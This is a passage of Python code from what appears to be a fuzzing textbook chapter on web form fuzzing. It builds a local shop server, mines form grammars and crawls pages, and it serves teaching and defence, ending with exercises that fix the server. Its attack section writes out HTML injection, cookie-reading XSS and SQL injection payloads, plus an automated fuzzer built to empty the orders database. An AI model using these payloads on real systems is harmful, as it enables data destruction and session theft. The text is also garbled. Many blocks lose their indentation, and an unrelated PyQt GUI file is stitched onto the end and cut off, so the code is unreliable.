        raise OSError("no free port in range 8800-8999")
    httpd_url = "http://" + host + ":" + repr(port)
    HTTPD_MESSAGE_QUEUE.put(httpd_url)
    httpd.serve_forever()
from multiprocess import Process
def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \
        -> Tuple[Process, str]:
    """Launch the web server in a child process.

    Returns the Process handle and the URL it serves; the URL is read
    from the message queue, where run_httpd_forever() publishes it first.
    """
    clear_httpd_messages()
    httpd_process = Process(target=run_httpd_forever, args=(handler_class,))
    httpd_process.start()
    httpd_url = HTTPD_MESSAGE_QUEUE.get()
    return httpd_process, httpd_url
if __name__ == '__main__':
httpd_process, httpd_url = start_httpd()
httpd_url
### Interacting with the Server
if __name__ == '__main__':
print('\n### Interacting with the Server')
#### Direct Browser Access
if __name__ == '__main__':
print('\n#### Direct Browser Access')
def print_url(url: str) -> None:
    """Show `url` as a clickable link in notebooks, plain text otherwise."""
    if not rich_output():
        print(terminal_escape(url))
        return
    markup = '<pre><a href="%s">%s</a></pre>' % (url, url)
    display(HTML(markup))
if __name__ == '__main__':
print_url(httpd_url)
if __name__ == '__main__':
from IPython.display import IFrame
if __name__ == '__main__':
IFrame(httpd_url, '100%', 230)
if __name__ == '__main__':
print_httpd_messages()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders")
db.commit()
#### Retrieving the Home Page
if __name__ == '__main__':
print('\n#### Retrieving the Home Page')
if __name__ == '__main__':
contents = webbrowser(httpd_url)
if __name__ == '__main__':
HTML(contents)
#### Placing Orders
if __name__ == '__main__':
print('\n#### Placing Orders')
from urllib.parse import urljoin, urlsplit
if __name__ == '__main__':
urljoin(httpd_url, "/order?foo=bar")
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
if __name__ == '__main__':
HTML(contents)
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
#### Error Messages
if __name__ == '__main__':
print('\n#### Error Messages')
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))
## Fuzzing Input Forms
## -------------------
if __name__ == '__main__':
print('\n## Fuzzing Input Forms')
### Fuzzing with Expected Values
if __name__ == '__main__':
print('\n### Fuzzing with Expected Values')
#### Excursion: Implementing cgi_decode()
if __name__ == '__main__':
print('\n#### Excursion: Implementing cgi_decode()')
import string
def cgi_encode(s: str, do_not_encode: str = "") -> str:
    """CGI-encode `s`: spaces become '+', unsafe characters become %xx.

    Characters in `do_not_encode` are passed through verbatim, in
    addition to letters, digits, and the standard safe punctuation.
    """
    safe = string.ascii_letters + string.digits + "$-_.+!*'()," + do_not_encode
    encoded = []
    for ch in s:
        if ch in safe:
            encoded.append(ch)
        elif ch == ' ':
            encoded.append('+')
        else:
            encoded.append("%%%02x" % ord(ch))
    return "".join(encoded)
if __name__ == '__main__':
s = cgi_encode('Is "DOW30" down .24%?')
s
if __name__ == '__main__':
cgi_encode("<string>@<string>", "<>")
from .Coverage import cgi_decode # minor dependency
if __name__ == '__main__':
cgi_decode(s)
#### End of Excursion
if __name__ == '__main__':
print('\n#### End of Excursion')
from .Grammars import crange, is_valid_grammar, syntax_diagram, Grammar
ORDER_GRAMMAR: Grammar = {
"<start>": ["<order>"],
"<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
"<item>": ["tshirt", "drill", "lockset"],
"<name>": [cgi_encode("Jane Doe"), cgi_encode("John Smith")],
"<email>": [cgi_encode("j.doe@example.com"), cgi_encode("j_smith@example.com")],
"<city>": ["Seattle", cgi_encode("New York")],
"<zip>": ["<digit>" * 5],
"<digit>": crange('0', '9')
}
if __name__ == '__main__':
assert is_valid_grammar(ORDER_GRAMMAR)
if __name__ == '__main__':
syntax_diagram(ORDER_GRAMMAR)
from .GrammarFuzzer import GrammarFuzzer
if __name__ == '__main__':
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Fuzzing with Unexpected Values
if __name__ == '__main__':
print('\n### Fuzzing with Unexpected Values')
if __name__ == '__main__':
seed = order_fuzzer.fuzz()
seed
from .MutationFuzzer import MutationFuzzer # minor deoendency
if __name__ == '__main__':
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
while True:
path = mutate_order_fuzzer.fuzz()
url = urljoin(httpd_url, path)
r = requests.get(url)
if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
break
if __name__ == '__main__':
url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(url))
if __name__ == '__main__':
failing_path = path
failing_path
from .Fuzzer import Runner
class WebRunner(Runner):
    """Runner for a Web server"""
    def __init__(self, base_url: str = None):
        """`base_url`: optional prefix resolved against relative fuzz inputs."""
        self.base_url = base_url
    def run(self, url: str) -> Tuple[str, str]:
        """Fetch `url` and map the HTTP status to a Runner outcome."""
        if self.base_url is not None:
            url = urljoin(self.base_url, url)
        import requests  # for imports
        status = requests.get(url).status_code
        if status == HTTPStatus.OK:
            outcome = Runner.PASS
        elif status == HTTPStatus.INTERNAL_SERVER_ERROR:
            outcome = Runner.FAIL
        else:
            outcome = Runner.UNRESOLVED
        return url, outcome
if __name__ == '__main__':
web_runner = WebRunner(httpd_url)
web_runner.run(failing_path)
from .Reducer import DeltaDebuggingReducer # minor
if __name__ == '__main__':
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path
if __name__ == '__main__':
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(minimized_url))
## Extracting Grammars for Input Forms
## -----------------------------------
if __name__ == '__main__':
print('\n## Extracting Grammars for Input Forms')
### Searching HTML for Input Fields
if __name__ == '__main__':
print('\n### Searching HTML for Input Fields')
if __name__ == '__main__':
html_text = webbrowser(httpd_url)
print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")])
from html.parser import HTMLParser
class FormHTMLParser(HTMLParser):
    """A parser for HTML forms"""
    def reset(self) -> None:
        """Clear all mined state (also invoked by HTMLParser.__init__)."""
        super().reset()
        self.action = ""  # form action attribute (a URL)
        # field name -> type string, or selection name -> [option, ...]
        self.fields: Dict[str, List[str]] = {}
        # stack of currently active <select>/<datalist> names
        self.select: List[str] = []
class FormHTMLParser(FormHTMLParser):
    def handle_starttag(self, tag, attrs):
        """Record the form action, input fields, and selection options."""
        attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
        # print(tag, attributes)

        if tag == "form":
            self.action = attributes.get("action", "")

        elif tag == "select" or tag == "datalist":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = []
                self.select.append(name)
            else:
                # Nameless selection: push a placeholder so options are skipped
                self.select.append(None)

        elif tag == "option" and "multiple" not in attributes:
            current_select_name = self.select[-1]
            if current_select_name is not None and "value" in attributes:
                self.fields[current_select_name].append(attributes["value"])

        elif tag == "input" or tag == "option" or tag == "textarea":
            if "name" in attributes:
                name = attributes["name"]
                # Scalar field: store its declared type (default "text")
                self.fields[name] = attributes.get("type", "text")

        elif tag == "button":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = [""]
class FormHTMLParser(FormHTMLParser):
    def handle_endtag(self, tag):
        """Pop the selection stack when a <select> element closes."""
        if tag == "select":
            self.select.pop()
class HTMLGrammarMiner:
    """Mine a grammar from a HTML form"""

    def __init__(self, html_text: str) -> None:
        """Constructor. `html_text` is the HTML string to parse."""
        html_parser = FormHTMLParser()
        html_parser.feed(html_text)
        # Capture the parsed field map and form action for mine_grammar()
        self.fields = html_parser.fields
        self.action = html_parser.action
if __name__ == '__main__':
    html_miner = HTMLGrammarMiner(html_text)
    html_miner.action

if __name__ == '__main__':
    html_miner.fields

### Mining Grammars for Web Pages

if __name__ == '__main__':
    print('\n### Mining Grammars for Web Pages')
from .Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar
class HTMLGrammarMiner(HTMLGrammarMiner):
    # Base grammar for URL queries: one expansion per HTML input type,
    # all values CGI-encoded.
    QUERY_GRAMMAR: Grammar = extend_grammar(CGI_GRAMMAR, {
        "<start>": ["<action>?<query>"],

        "<text>": ["<string>"],

        "<number>": ["<digits>"],
        "<digits>": ["<digit>", "<digits><digit>"],
        "<digit>": crange('0', '9'),

        "<checkbox>": ["<_checkbox>"],
        "<_checkbox>": ["on", "off"],

        "<email>": ["<_email>"],
        "<_email>": [cgi_encode("<string>@<string>", "<>")],

        # Use a fixed password in case we need to repeat it
        "<password>": ["<_password>"],
        "<_password>": ["abcABC.123"],

        # Stick to printable characters to avoid logging problems
        "<percent>": ["%<hexdigit-1><hexdigit>"],
        "<hexdigit-1>": srange("34567"),

        # Submissions:
        "<submit>": [""]
    })
class HTMLGrammarMiner(HTMLGrammarMiner):
    def mine_grammar(self) -> Grammar:
        """Extract a grammar from the given HTML text"""
        grammar: Grammar = extend_grammar(self.QUERY_GRAMMAR)
        grammar["<action>"] = [self.action]

        # Build the <query> expansion, one "&"-joined symbol per form field
        query = ""
        for field in self.fields:
            field_symbol = new_symbol(grammar, "<" + field + ">")
            field_type = self.fields[field]
            if query != "":
                query += "&"
            query += field_symbol
            if isinstance(field_type, str):
                # Scalar field: expand into its input type's symbol
                field_type_symbol = "<" + field_type + ">"
                grammar[field_symbol] = [field + "=" + field_type_symbol]
                if field_type_symbol not in grammar:
                    # Unknown type
                    grammar[field_type_symbol] = ["<text>"]
            else:
                # List of values
                value_symbol = new_symbol(grammar, "<" + field + "-value>")
                grammar[field_symbol] = [field + "=" + value_symbol]
                grammar[value_symbol] = field_type  # type: ignore

        grammar["<query>"] = [query]

        # Remove unused parts
        for nonterminal in unreachable_nonterminals(grammar):
            del grammar[nonterminal]

        assert is_valid_grammar(grammar)
        return grammar
if __name__ == '__main__':
    html_miner = HTMLGrammarMiner(html_text)
    grammar = html_miner.mine_grammar()
    grammar

if __name__ == '__main__':
    grammar["<start>"]

if __name__ == '__main__':
    grammar["<action>"]

if __name__ == '__main__':
    grammar["<query>"]

if __name__ == '__main__':
    grammar["<zip>"]

if __name__ == '__main__':
    grammar["<terms>"]

if __name__ == '__main__':
    order_fuzzer = GrammarFuzzer(grammar)
    [order_fuzzer.fuzz() for i in range(3)]

if __name__ == '__main__':
    HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))

### A Fuzzer for Web Forms

if __name__ == '__main__':
    print('\n### A Fuzzer for Web Forms')
class WebFormFuzzer(GrammarFuzzer):
    """A Fuzzer for Web forms"""

    def __init__(self, url: str, *,
                 grammar_miner_class: Optional[type] = None,
                 **grammar_fuzzer_options):
        """Constructor.
        `url` - the URL of the Web form to fuzz.
        `grammar_miner_class` - the class of the grammar miner
            to use (default: `HTMLGrammarMiner`)
        Other keyword arguments are passed to the `GrammarFuzzer` constructor
        """
        if grammar_miner_class is None:
            grammar_miner_class = HTMLGrammarMiner
        self.grammar_miner_class = grammar_miner_class

        # We first extract the HTML form and its grammar...
        html_text = self.get_html(url)
        grammar = self.get_grammar(html_text)

        # ... and then initialize the `GrammarFuzzer` superclass with it
        super().__init__(grammar, **grammar_fuzzer_options)

    def get_html(self, url: str):
        """Retrieve the HTML text for the given URL `url`.
        To be overloaded in subclasses."""
        return requests.get(url).text

    def get_grammar(self, html_text: str):
        """Obtain the grammar for the given HTML `html_text`.
        To be overloaded in subclasses."""
        grammar_miner = self.grammar_miner_class(html_text)
        return grammar_miner.mine_grammar()
if __name__ == '__main__':
    web_form_fuzzer = WebFormFuzzer(httpd_url)
    web_form_fuzzer.fuzz()

if __name__ == '__main__':
    web_form_runner = WebRunner(httpd_url)
    web_form_fuzzer.runs(web_form_runner, 10)

if __name__ == '__main__':
    clear_httpd_messages()

## Crawling User Interfaces
## ------------------------

if __name__ == '__main__':
    print('\n## Crawling User Interfaces')
class LinkHTMLParser(HTMLParser):
    """Parse all links found in a HTML page"""

    def reset(self):
        super().reset()
        # href targets of all <a> tags seen so far, in document order
        self.links = []

    def handle_starttag(self, tag, attrs):
        attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
        if tag == "a" and "href" in attributes:
            # print("Found:", tag, attributes)
            self.links.append(attributes["href"])
### Excursion: Implementing a Crawler

if __name__ == '__main__':
    print('\n### Excursion: Implementing a Crawler')
from collections import deque
import urllib.robotparser
def crawl(url, max_pages: Union[int, float] = 1, same_host: bool = True):
    """Return the list of linked URLs from the given URL.
    `max_pages` - the maximum number of pages accessed.
    `same_host` - if True (default), stay on the same host"""
    pages = deque([(url, "<param>")])
    urls_seen = set()

    # Honor the site's robots.txt while crawling
    rp = urllib.robotparser.RobotFileParser()
    rp.set_url(urljoin(url, "/robots.txt"))
    rp.read()

    while len(pages) > 0 and max_pages > 0:
        page, referrer = pages.popleft()
        if not rp.can_fetch("*", page):
            # Disallowed by robots.txt
            continue

        r = requests.get(page)
        max_pages -= 1

        if r.status_code != HTTPStatus.OK:
            print("Error " + repr(r.status_code) + ": " + page,
                  "(referenced from " + referrer + ")",
                  file=sys.stderr)
            continue

        content_type = r.headers["content-type"]
        if not content_type.startswith("text/html"):
            continue

        parser = LinkHTMLParser()
        parser.feed(r.text)

        for link in parser.links:
            target_url = urljoin(page, link)
            if same_host and urlsplit(
                    target_url).hostname != urlsplit(url).hostname:
                # Different host
                continue

            if urlsplit(target_url).fragment != "":
                # Ignore #fragments
                continue

            if target_url not in urls_seen:
                pages.append((target_url, page))
                urls_seen.add(target_url)
                yield target_url

        # Also yield the page itself the first time it is fetched
        if page not in urls_seen:
            urls_seen.add(page)
            yield page
### End of Excursion

if __name__ == '__main__':
    print('\n### End of Excursion')

if __name__ == '__main__':
    for url in crawl(httpd_url):
        print_httpd_messages()
        print_url(url)

if __name__ == '__main__':
    for url in crawl("https://www.fuzzingbook.org/"):
        print_url(url)

if __name__ == '__main__':
    # Fuzz every form found while crawling the local server
    for url in crawl(httpd_url, max_pages=float('inf')):
        web_form_fuzzer = WebFormFuzzer(url)
        web_form_runner = WebRunner(url)
        print(web_form_fuzzer.run(web_form_runner))

if __name__ == '__main__':
    clear_httpd_messages()

## Crafting Web Attacks
## --------------------

if __name__ == '__main__':
    print('\n## Crafting Web Attacks')

### HTML Injection Attacks

if __name__ == '__main__':
    print('\n### HTML Injection Attacks')
from .Grammars import extend_grammar
# Order grammar whose <name> field carries an HTML payload
ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [cgi_encode('''
Jane Doe<p>
<strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
</p>
''')],
})

if __name__ == '__main__':
    html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
    order_with_injected_html = html_injection_fuzzer.fuzz()
    order_with_injected_html

if __name__ == '__main__':
    HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))

if __name__ == '__main__':
    print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall())
### Cross-Site Scripting Attacks

if __name__ == '__main__':
    print('\n### Cross-Site Scripting Attacks')

# <name> payload: script that copies the first cookie chars into the title
ORDER_GRAMMAR_WITH_XSS_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [cgi_encode('Jane Doe' +
                          '<script>' +
                          'document.title = document.cookie.substring(0, 10);' +
                          '</script>')
               ],
})

if __name__ == '__main__':
    xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)
    order_with_injected_xss = xss_injection_fuzzer.fuzz()
    order_with_injected_xss

if __name__ == '__main__':
    url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)
    url_with_injected_xss

if __name__ == '__main__':
    HTML(webbrowser(url_with_injected_xss, mute=True))

if __name__ == '__main__':
    HTML('<script>document.title = "Jupyter"</script>')

### SQL Injection Attacks

if __name__ == '__main__':
    print('\n### SQL Injection Attacks')

if __name__ == '__main__':
    values: Dict[str, str] = {
        "item": "tshirt",
        "name": "Jane Doe",
        "email": "j.doe@example.com",
        "city": "Seattle",
        "zip": "98104"
    }

if __name__ == '__main__':
    sql_command = ("INSERT INTO orders " +
                   "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
    sql_command

if __name__ == '__main__':
    # Classic injection: close the VALUES list, run DELETE, comment out the rest
    values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- "

if __name__ == '__main__':
    sql_command = ("INSERT INTO orders " +
                   "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
    sql_command

from .Grammars import extend_grammar

ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})

if __name__ == '__main__':
    sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
    order_with_injected_sql = sql_injection_fuzzer.fuzz()
    order_with_injected_sql

if __name__ == '__main__':
    print(db.execute("SELECT * FROM orders").fetchall())

if __name__ == '__main__':
    contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))

if __name__ == '__main__':
    print(db.execute("SELECT * FROM orders").fetchall())

### Leaking Internal Information

if __name__ == '__main__':
    print('\n### Leaking Internal Information')

if __name__ == '__main__':
    answer = webbrowser(urljoin(httpd_url, "/order"), mute=True)

if __name__ == '__main__':
    HTML(answer)

## Fully Automatic Web Attacks
## ---------------------------

if __name__ == '__main__':
    print('\n## Fully Automatic Web Attacks')
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
    """Demonstration of an automatic SQL Injection attack grammar miner"""

    # Some common attack schemes
    ATTACKS: List[str] = [
        "<string>' <sql-values>); <sql-payload>; <sql-comment>",
        "<string>' <sql-comment>",
        "' OR 1=1<sql-comment>'",
        "<number> OR 1=1",
    ]

    def __init__(self, html_text: str, sql_payload: str):
        """Constructor.
        `html_text` - the HTML form to be attacked
        `sql_payload` - the SQL command to be executed
        """
        super().__init__(html_text)

        # Extend every free-text input type with injection alternatives
        self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
            "<text>": ["<string>", "<sql-injection-attack>"],
            "<number>": ["<digits>", "<sql-injection-attack>"],
            "<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
            "<email>": ["<_email>", "<sql-injection-attack>"],
            "<sql-injection-attack>": [
                cgi_encode(attack, "<->") for attack in self.ATTACKS
            ],
            "<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")],
            "<sql-payload>": [cgi_encode(sql_payload)],
            "<sql-comment>": ["--", "#"],
        })
if __name__ == '__main__':
    html_miner = SQLInjectionGrammarMiner(
        html_text, sql_payload="DROP TABLE orders")

if __name__ == '__main__':
    grammar = html_miner.mine_grammar()
    grammar

if __name__ == '__main__':
    grammar["<text>"]

if __name__ == '__main__':
    sql_fuzzer = GrammarFuzzer(grammar)
    sql_fuzzer.fuzz()

if __name__ == '__main__':
    print(db.execute("SELECT * FROM orders").fetchall())

if __name__ == '__main__':
    contents = webbrowser(urljoin(
        httpd_url,
        "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
def orders_db_is_empty():
    """Return True if the orders database is empty (= we have been successful)"""
    try:
        entries = db.execute("SELECT * FROM orders").fetchall()
    except sqlite3.OperationalError:
        # Table dropped entirely: also counts as "empty"
        return True
    return len(entries) == 0
if __name__ == '__main__':
    orders_db_is_empty()
class SQLInjectionFuzzer(WebFormFuzzer):
    """Simple demonstrator of a SQL Injection Fuzzer"""

    def __init__(self, url: str, sql_payload: str = "", *,
                 sql_injection_grammar_miner_class: Optional[type] = None,
                 **kwargs):
        """Constructor.
        `url` - the Web page (with a form) to retrieve
        `sql_payload` - the SQL command to execute
        `sql_injection_grammar_miner_class` - the miner to be used
            (default: SQLInjectionGrammarMiner)
        Other keyword arguments are passed to `WebFormFuzzer`.
        """
        self.sql_payload = sql_payload
        if sql_injection_grammar_miner_class is None:
            sql_injection_grammar_miner_class = SQLInjectionGrammarMiner
        self.sql_injection_grammar_miner_class = sql_injection_grammar_miner_class
        super().__init__(url, **kwargs)

    def get_grammar(self, html_text):
        """Obtain a grammar with SQL injection commands"""
        grammar_miner = self.sql_injection_grammar_miner_class(
            html_text, sql_payload=self.sql_payload)
        return grammar_miner.mine_grammar()
if __name__ == '__main__':
    sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
    web_runner = WebRunner(httpd_url)
    trials = 1

    # Keep fuzzing until the injected DELETE has emptied the database
    while True:
        sql_fuzzer.run(web_runner)
        if orders_db_is_empty():
            break
        trials += 1

if __name__ == '__main__':
    trials

if __name__ == '__main__':
    orders_db_is_empty()

## Synopsis
## --------

if __name__ == '__main__':
    print('\n## Synopsis')

### Fuzzing Web Forms

if __name__ == '__main__':
    print('\n### Fuzzing Web Forms')

if __name__ == '__main__':
    web_form_fuzzer = WebFormFuzzer(httpd_url)

if __name__ == '__main__':
    web_form_fuzzer.grammar['<start>']

if __name__ == '__main__':
    web_form_fuzzer.grammar['<action>']

if __name__ == '__main__':
    web_form_fuzzer.grammar['<query>']

if __name__ == '__main__':
    web_form_fuzzer.fuzz()

### SQL Injection Attacks

if __name__ == '__main__':
    print('\n### SQL Injection Attacks')

if __name__ == '__main__':
    sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
    sql_fuzzer.fuzz()
from .ClassDiagram import display_class_hierarchy
from .Fuzzer import Fuzzer, Runner
from .Grammars import Grammar, Expansion
from .GrammarFuzzer import GrammarFuzzer, DerivationTree
if __name__ == '__main__':
    display_class_hierarchy([WebFormFuzzer, SQLInjectionFuzzer, WebRunner,
                             HTMLGrammarMiner, SQLInjectionGrammarMiner],
                            public_methods=[
                                Fuzzer.__init__,
                                Fuzzer.fuzz,
                                Fuzzer.run,
                                Fuzzer.runs,
                                Runner.__init__,
                                Runner.run,
                                WebRunner.__init__,
                                WebRunner.run,
                                GrammarFuzzer.__init__,
                                GrammarFuzzer.fuzz,
                                GrammarFuzzer.fuzz_tree,
                                WebFormFuzzer.__init__,
                                SQLInjectionFuzzer.__init__,
                                HTMLGrammarMiner.__init__,
                                SQLInjectionGrammarMiner.__init__,
                            ],
                            types={
                                'DerivationTree': DerivationTree,
                                'Expansion': Expansion,
                                'Grammar': Grammar
                            },
                            project='fuzzingbook')

## Lessons Learned
## ---------------

if __name__ == '__main__':
    print('\n## Lessons Learned')

if __name__ == '__main__':
    clear_httpd_messages()

if __name__ == '__main__':
    httpd_process.terminate()

## Next Steps
## ----------

if __name__ == '__main__':
    print('\n## Next Steps')
## Background
## ----------

if __name__ == '__main__':
    print('\n## Background')

## Exercises
## ---------

if __name__ == '__main__':
    print('\n## Exercises')

### Exercise 1: Fix the Server

if __name__ == '__main__':
    print('\n### Exercise 1: Fix the Server')

#### Part 1: Silent Failures

if __name__ == '__main__':
    print('\n#### Part 1: Silent Failures')

# Error page with the exception details removed from the client response
BETTER_HTML_INTERNAL_SERVER_ERROR = \
    HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "")

if __name__ == '__main__':
    HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)
class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):
    def internal_server_error(self):
        """Log the traceback server-side; reply with a generic error page."""
        # Note: No INTERNAL_SERVER_ERROR status
        self.send_response(HTTPStatus.OK, "Internal Error")
        self.send_header("Content-type", "text/html")
        self.end_headers()

        # Keep the traceback in the server log only
        exc = traceback.format_exc()
        self.log_message("%s", exc.strip())

        # No traceback or other information
        message = BETTER_HTML_INTERNAL_SERVER_ERROR
        self.wfile.write(message.encode("utf8"))
#### Part 2: Sanitized HTML

if __name__ == '__main__':
    print('\n#### Part 2: Sanitized HTML')

import html
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
    def send_order_received(self, values):
        """Confirm the order, HTML-escaping every user-supplied value."""
        sanitized_values = {}
        for field in values:
            sanitized_values[field] = html.escape(values[field])
        sanitized_values["item_name"] = html.escape(
            FUZZINGBOOK_SWAG[values["item"]])

        confirmation = HTML_ORDER_RECEIVED.format(
            **sanitized_values).encode("utf8")

        self.send_response(HTTPStatus.OK, "Order received")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(confirmation)
#### Part 3: Sanitized SQL

if __name__ == '__main__':
    print('\n#### Part 3: Sanitized SQL')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
    def store_order(self, values):
        """Insert the order using a parameterized query (no SQL injection)."""
        db = sqlite3.connect(ORDERS_DB)
        db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
                   (values['item'], values['name'], values['email'],
                    values['city'], values['zip']))
        db.commit()
#### Part 4: A Robust Server

if __name__ == '__main__':
    print('\n#### Part 4: A Robust Server')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
    # Fields an order must contain to be accepted
    REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']

    def handle_order(self):
        """Store the order if complete; otherwise re-send the blank form."""
        values = self.get_field_values()
        for required_field in self.REQUIRED_FIELDS:
            if required_field not in values:
                self.send_order_form()
                return

        self.store_order(values)
        self.send_order_received(values)
#### Part 5: Test it!

if __name__ == '__main__':
    print('\n#### Part 5: Test it!')

if __name__ == '__main__':
    httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)

if __name__ == '__main__':
    print_url(httpd_url)

if __name__ == '__main__':
    print_httpd_messages()

if __name__ == '__main__':
    standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"
    contents = webbrowser(httpd_url + standard_order)
    HTML(contents)

if __name__ == '__main__':
    assert contents.find("Thank you") > 0

if __name__ == '__main__':
    bad_order = "/order?item="
    contents = webbrowser(httpd_url + bad_order)
    HTML(contents)

if __name__ == '__main__':
    assert contents.find("Order Form") > 0

if __name__ == '__main__':
    injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \
        "&email=doe%40example.com&city=Seattle&zip=98104"
    contents = webbrowser(httpd_url + injection_order)
    HTML(contents)

if __name__ == '__main__':
    assert contents.find("Thank you") > 0
    # The raw tag must be gone from the sanitized page ...
    assert contents.find("<script>") < 0
    # ... and present only in its HTML-escaped form.
    # BUG FIX: was `assert contents.find("<script>") > 0`, which directly
    # contradicts the previous assertion and can never hold.
    assert contents.find("&lt;script&gt;") > 0

if __name__ == '__main__':
    sql_order = "/order?item=tshirt&name=" + \
        cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \
        "&email=doe%40example.com&city=Seattle&zip=98104"
    contents = webbrowser(httpd_url + sql_order)
    HTML(contents)

if __name__ == '__main__':
    # The injection attempt is stored as literal text, not executed
    assert contents.find("DELETE FROM") > 0
    assert not orders_db_is_empty()

if __name__ == '__main__':
    httpd_process.terminate()

if __name__ == '__main__':
    if os.path.exists(ORDERS_DB):
        os.remove(ORDERS_DB)
### Exercise 2: Protect the Server

if __name__ == '__main__':
    print('\n### Exercise 2: Protect the Server')

#### Part 1: A Blacklisting Filter

if __name__ == '__main__':
    print('\n#### Part 1: A Blacklisting Filter')

#### Part 2: A Whitelisting Filter

if __name__ == '__main__':
    print('\n#### Part 2: A Whitelisting Filter')

### Exercise 3: Input Patterns

if __name__ == '__main__':
    print('\n### Exercise 3: Input Patterns')

### Exercise 4: Coverage-Driven Web Fuzzing

if __name__ == '__main__':
    print('\n### Exercise 4: Coverage-Driven Web Fuzzing')
|
qgui1.py | #!/usr/bin/python
#from PyQt4.QtCore import *
#from PyQt4.QtGui import *
#from PyQt4.Qwt5 import *
import socket
import struct
import logging
import sys,getopt
import os
import random
import numpy
from matplotlib import pyplot as plt
import threading
import sys, time
from PyQt4 import QtCore, QtGui, Qwt5,Qt
import paramhg
sys.path.append('../runtime')
import eth_test
class qgui(QtGui.QWidget):
def __init__(self,regs=None):
QtGui.QWidget.__init__(self)
self.setGeometry(300, 300, 1000, 600)
self.setWindowTitle('qgui')
self.fig1=Qwt5.QwtPlot()
self.fig1.setParent(self)
self.fig1.setGeometry(300,0,400,300)
self.fig2=Qwt5.QwtPlot()
self.fig2.setParent(self)
self.fig2.setGeometry(300,300,400,300)
self.curves1=[]
self.curves2=[]
pens=[QtCore.Qt.red,
QtCore.Qt.black,
QtCore.Qt.cyan,
QtCore.Qt.darkCyan,
QtCore.Qt.darkRed,
QtCore.Qt.magenta,
QtCore.Qt.darkMagenta,
QtCore.Qt.green,
QtCore.Qt.darkGreen,
QtCore.Qt.yellow,
QtCore.Qt.darkYellow,
QtCore.Qt.blue,
QtCore.Qt.darkBlue,
QtCore.Qt.gray,
QtCore.Qt.darkGray,
QtCore.Qt.lightGray]
for index in range(16): #up to 16 curves here
self.curves1.append(Qwt5.QwtPlotCurve())
self.curves1[index].attach(self.fig1)
self.curves1[index].setPen(QtGui.QPen(pens[index]))
self.curves2.append(Qwt5.QwtPlotCurve())
self.curves2[index].attach(self.fig2)
self.curves2[index].setPen(QtGui.QPen(pens[index]))
self.layout = QtGui.QVBoxLayout(self)
self.layout.setContentsMargins(0,0,0,0)
self.layout.setSpacing(0)
self.slider={}
self.param={}
index=0
for reg in regs:
self.slider[index]=param_slider(self,name=reg.name,process=self.test1,y0=index*30,init=reg.value,s_min=reg.min_value,s_max=reg.max_value)
